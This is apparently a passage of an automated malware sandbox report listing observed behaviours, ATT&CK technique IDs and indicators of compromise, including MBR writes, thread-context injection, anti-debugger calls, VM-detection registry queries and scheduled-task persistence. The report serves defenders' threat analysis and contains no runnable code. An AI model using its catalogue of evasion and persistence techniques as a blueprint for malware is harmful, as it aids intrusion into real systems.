5719	pastebin.com

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
154	api.ipify.org
162	ipinfo.io
163	ipinfo.io
2911	api.ipify.org
7418	api.ipify.org
7476	api.ipify.org
92	api.ipify.org
93	api.ipify.org

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	eee01.exe

AutoIT Executable 6 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/memory/1028-612-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral1/memory/5388-647-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral1/memory/1028-646-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral1/memory/5388-669-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral1/memory/956-670-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe
behavioral1/memory/956-954-0x0000000000400000-0x00000000004CD000-memory.dmp	autoit_exe

Checks system information in the registry 2 TTPs 4 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	procexp64.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
4348	lomik.exe
4348	lomik.exe
4348	lomik.exe
4348	lomik.exe
4348	lomik.exe
4348	lomik.exe
4348	lomik.exe
4348	lomik.exe

Suspicious use of SetThreadContext 14 IoCs

description	pid	Process	procid_target
PID 5992 set thread context of 1784	5992	hjv.exe	128
PID 5180 set thread context of 3572	5180	crypted.exe	137
PID 2188 set thread context of 2164	2188	HJCL.exe	143
PID 2164 set thread context of 3396	2164	HJCL.exe	156
PID 2164 set thread context of 5232	2164	HJCL.exe	157
PID 2164 set thread context of 3680	2164	HJCL.exe	158
PID 5188 set thread context of 4308	5188	hjv.exe	168
PID 5212 set thread context of 2564	5212	HJCL.exe	169
PID 1140 set thread context of 1784	1140	crypted.exe	183
PID 1832 set thread context of 5660	1832	html.exe	189
PID 5660 set thread context of 3580	5660	html.exe	56
PID 5572 set thread context of 3580	5572	systray.exe	56
PID 3320 set thread context of 4316	3320	140.exe	222
PID 3792 set thread context of 2300	3792	140.exe	238

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\lqrjma.exe	svcyr.exe
File opened for modification	C:\Windows\lqrjma.exe	svcyr.exe
File created	C:\Windows\Tasks\explorta.job	VNSeRtG2pRnniLB_eQlq.exe
File created	C:\Windows\Tasks\MSI.CentralServer.job	cp.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
8612	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000800000002358d-41488.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 46 IoCs

pid	pid_target	Process	procid_target
1124	408	WerFault.exe	115
3532	2268	WerFault.exe	180
5948	2268	WerFault.exe	180
7140	6400	WerFault.exe	259
8500	6400	WerFault.exe	259
756	8476	WerFault.exe	280
8164	7680	WerFault.exe	300
7940	5484	WerFault.exe	246
6648	2268	WerFault.exe	180
8000	7000	WerFault.exe	315
6232	7000	WerFault.exe	315
1236	5484	WerFault.exe	246
7052	5484	WerFault.exe	246
7368	2288	WerFault.exe	333
8468	6216	WerFault.exe	391
8100	6216	WerFault.exe	391
7240	6216	WerFault.exe	391
3644	6216	WerFault.exe	391
9008	6216	WerFault.exe	391
7440	6216	WerFault.exe	391
8972	6216	WerFault.exe	391
8992	6216	WerFault.exe	391
3108	6216	WerFault.exe	391
8700	6216	WerFault.exe	391
7588	2676	WerFault.exe	413
8080	2676	WerFault.exe	413
3636	2676	WerFault.exe	413
8064	2676	WerFault.exe	413
4676	2676	WerFault.exe	413
5736	2676	WerFault.exe	413
4956	2676	WerFault.exe	413
5396	2676	WerFault.exe	413
8760	2676	WerFault.exe	413
7856	2676	WerFault.exe	413
8920	2676	WerFault.exe	413
7464	2676	WerFault.exe	413
6536	2676	WerFault.exe	413
8104	2268	WerFault.exe	180
6336	2676	WerFault.exe	413
9204	2268	WerFault.exe	180
8048	2676	WerFault.exe	413
8428	5784	WerFault.exe	519
5724	6516	WerFault.exe	604
3632	2268	WerFault.exe	180
8228	2268	WerFault.exe	180
3348	2676	WerFault.exe	413

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral1/files/0x000c00000002350a-23772.dat	nsis_installer_2
behavioral1/files/0x001300000002354b-27740.dat	nsis_installer_1
behavioral1/files/0x001300000002354b-27740.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 39 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LowerFilters	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	procexp64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	procexp64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\UpperFilters	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	procexp64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters	procexp64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\LowerFilters	procexp64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\Control	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LowerFilters	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	procexp64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	procexp64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\Control	procexp64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	procexp64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters	procexp64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\LowerFilters	procexp64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\Control	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\UpperFilters	procexp64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\Control	procexp64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	procexp64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	procexp64.exe

Checks processor information in registry 2 TTPs 36 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	procexp64.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	procexp64.exe
Key opened	\Registry\Machine\Hardware\Description\System\CentralProcessor	procexp64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	procexp64.exe
Key opened	\Registry\Machine\Hardware\Description\System\CentralProcessor	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	lqrjma.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	procexp64.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	lomik.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	procexp64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AnyDesk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	procexp64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	lomik.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	lqrjma.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	procexp64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	procexp64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	procexp64.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	procexp64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	procexp64.exe

Creates scheduled task(s) 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5392	schtasks.exe
4220	schtasks.exe
6684	schtasks.exe
8708	schtasks.exe
8008	schtasks.exe
3676	schtasks.exe
2308	schtasks.exe
7792	schtasks.exe
1236	schtasks.exe
4028	schtasks.exe
1604	schtasks.exe
6252	schtasks.exe
7304	schtasks.exe
7608	schtasks.exe
3900	schtasks.exe
7472	schtasks.exe
6960	schtasks.exe
5212	schtasks.exe
8336	schtasks.exe
7848	schtasks.exe
4700	schtasks.exe
2760	schtasks.exe
6744	schtasks.exe
6088	schtasks.exe
8464	schtasks.exe
8544	schtasks.exe
440	schtasks.exe
8016	schtasks.exe
7332	schtasks.exe
6156	schtasks.exe
9208	schtasks.exe
6788	schtasks.exe
5828	schtasks.exe
4520	schtasks.exe
8716	schtasks.exe
3632	schtasks.exe
2580	schtasks.exe
904	schtasks.exe
2564	schtasks.exe
7860	schtasks.exe
1376	schtasks.exe
6052	schtasks.exe
8236	schtasks.exe
2628	schtasks.exe
5536	schtasks.exe
2460	schtasks.exe
6556	schtasks.exe
6664	schtasks.exe
7060	schtasks.exe
4048	schtasks.exe
400	schtasks.exe
7196	schtasks.exe
4820	schtasks.exe
6992	schtasks.exe
8564	schtasks.exe
7276	schtasks.exe
2284	schtasks.exe
2528	schtasks.exe
6988	schtasks.exe
1828	schtasks.exe
6260	schtasks.exe
7972	schtasks.exe
5736	schtasks.exe
8196	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
2840	timeout.exe
6152	timeout.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE

Modifies registry class 40 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 01000000020000000300000000000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 02000000010000000300000000000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000070000001800000030f125b7ef471a10a5f102608c9eebac0a000000f000000030f125b7ef471a10a5f102608c9eebac04000000a0000000e0cc8de8b3b7d111a9f000aa0060fa310600000080000000e0cc8de8b3b7d111a9f000aa0060fa31020000005000000030f125b7ef471a10a5f102608c9eebac0c00000080000000e0cc8de8b3b7d111a9f000aa0060fa31040000005000000030f125b7ef471a10a5f102608c9eebac0e000000a0000000	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\NodeSlot = "4"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\MRUListEx = ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByDirection = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 = 8a003200c61d00009457396320004e45575445587e312e5a495000006e0009000400efbea958a54aa958a54a2e0000003fda0100000006000000000000000000000000000000000000004e006500770020005400650078007400200044006f00630075006d0065006e00740020006d006f0064002e0065007800730065002e007a006900700000001c000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 03000000020000000100000000000000ffffffff	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Mode = "4"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupView = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:PID = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\LogicalViewMode = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874369"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874385"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\IconSize = "16"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 02000000030000000100000000000000ffffffff	Explorer.EXE

